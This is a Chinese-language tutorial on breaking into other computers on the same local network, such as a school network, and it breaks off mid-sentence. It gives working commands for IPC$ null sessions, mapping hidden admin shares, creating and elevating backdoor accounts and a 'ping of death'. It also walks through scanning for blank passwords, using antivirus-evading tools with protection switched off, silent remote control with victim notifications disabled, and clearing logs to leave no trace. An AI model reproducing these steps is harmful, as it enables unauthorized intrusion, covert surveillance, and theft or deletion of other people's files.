如何入侵局域网电脑(如何入侵同一局域网的电脑)

首先你要知道跟你同一个局域网的用户是否开启了防火墙或者禁止了同一局域网的共享和安全如何入侵局域网电脑!如果对方禁用了共享,那你是进不去的,只有用歪门邪道进去了方法如下

如何入侵局域网电脑(如何入侵同一局域网的电脑)

一、 在该机创建一个批处理文件,内容如下:

net user admin /add

net localgroup administrators admin /add

将上述的批处理文件保存为 admin.bat.

注:上述批处理文件作用是创建一个名为 admin 的管理员帐户(密码为空)。

二、将此批处理文件作为Windows 的开机启动脚本。

1、在 运行 对话框中输入 gpedit.msc

2、定位到 计算机配置一>Windows设置一>脚本 (启动/关机), 双击右边窗口的 启动,在其中添加先前创建的 admin.bat。

3、重新启动计算机(两次),系统便有了一个名为admin 的管理员

上述操作在Windows 2000/XP中可行,但要保证帐户可以访问注册表,组策略(创建帐户的操作实际上也就是在注册表中添加相应的项和值),而Windows中的缺省的Guest/受限帐户并无此限制。

或许,我们并不需要用Guest帐户去创建一个管理员,但设想如果某个程序只有管理员可执行,是否也就可用上述的方法来实现呢?

小结:Windows系统默认对Guest/受限帐户的限制只是表面上的,作为一个有经验的系统管理员,要做的事情还很多,起码应该禁止受限用户访问/修改注册表,组策略等。

请教如何侵入局域网内的一台计算机

net use \\\\ip\\ipc$ \" \" /user:\" \" 建立IPC空链接

net use \\\\ip\\ipc$ \"密码\" /user:\"用户名\" 建立IPC非空链接

net use h: \\\\ip\\c$ \"密码\" /user:\"用户名\" 直接登陆后映射对方C:到本地为H:

net use h: \\\\ip\\c$ 登陆后映射对方C:到本地为H:

net use \\\\ip\\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把\"用户\"添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\\\目标ip 查看对方时间

net time \\\\目标ip /set 设置本地计算机时间与\"目标IP\"主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\\\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip \"文本信息\" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:\"-w数字\"用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:\"-l[空格]数据包大小\";\"-n发送数据次数\";\"-t\"指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数\"/all\"显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如\"DEL/AR *.*\"表示删除当前目录下所有只读文件,\"DEL/A-S *.*\"表示删除当前目录下除系统文件以外的所有文件

1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;

2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。

入侵工具:

一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)

入侵步骤:

1.使用\"NTscan变态扫描器\",在IP处填上要扫描的IP范围,选择\"WMI扫描\"方式,按\"开始\"后就等扫描结果了。

2.使用\"Recton--D贺免杀专用版\"

选择\"CMD命令\"项,在\"CMD:\"中输入\"net share C$=C:\\\",即可开启远程主机的C盘共享,以此将\"C\"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入\"\\\\对方IP\\C$\",即可进入对方C盘。

选择\"Telnet\"项,在\"远程主机\"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在\"CMD选项\"中,执行命令:\"net share ipc$\",接着执行:\"net share admin$\",最后执行\"net use \\\\***.***.***.***\\IPC$ \"\" /user:administrator\"在*处填入你入侵的主机IP。

3.使用\"DameWare迷你中文版 4.5\",安装后点\"DameWare Mini Remote Control\",在\"帮助\"项中选择激活产品,输入注册信息,成功注册后,进入\"远程连接\"窗口,在\"主机\"处填入IP地址,点\"设置\",在\"服务安装选项\"中点\"编辑\"后,在\"通知对话框\"中去掉\"连接时通知\",在\"附加设置\"中全都不选,在\"用户选项\"中去掉\"启用用户选项菜单\"。设置完成好后,就可点\"连接\",在弹出的对话框中点\"确定\"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。

入侵步骤补充:

1.在以上第2步中,远程启动Telnet服务可以通过\"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动\"完成。

2.Recton--D贺免杀专用版还有其他功能,在\"进程\"项中,可以查看远程主机的进程,并可任意结束其中进程;在\"共享\"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\\,D:\\等,共享好后在地址栏中输入\"\\\\IP\\C$\",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选\"日志\",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。

3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先\"telnet IP\",telnet上去,键入y后输入的用户名\"administrator\",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):\"net share C$=C:\",共享system文件夹:\"net share c=c:\\winnt\\system32\",共享IPC$用:\"net share IPC$\"等,最后是关闭共享,关闭C盘共享:\"net share C$ /del\"。

4.为方便下次入侵,可以设置后门, 查看用户:\"net user\",激活guest用户

\"net user guest /active:yes\",更改guest的密码为poco:\"net user guest poco\",把guest的权限提升为管理员权限:\"net localgroup administrators guest /add\"。

5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:\"\"dir d:\\\",查看C盘program file文件夹:\"dir c:\\PROGRA~1\\;\",60秒倒记时关机:\"shutdown -s -t 60\"

补充说明:

1.net use错误原因解决:

(1).\"发生系统错误 1326。 登录失败: 未知的用户名或错误密码。\"

在远程机的\"控制面板-文件夹选项-查看-简单的文件共享\",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的.

(2)\"发生系统错误 1327。 登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。\"在远程机的\"控制面板-管理工具-本地安全策略-安全选项-用户权限\"指派里,禁用\"空密码用户只能进行控制台登陆\".

(3)\"//IP/c$\"时提示找不到网络途径。在\"网络和拨号连接\"中\"本地连接\"中选取\"Internet协议(TCP/IP)\"属性,进入\"高级TCP/IP设置\"选\"WINS设置\"里面有一项\"启用TCP/IP的NETBIOS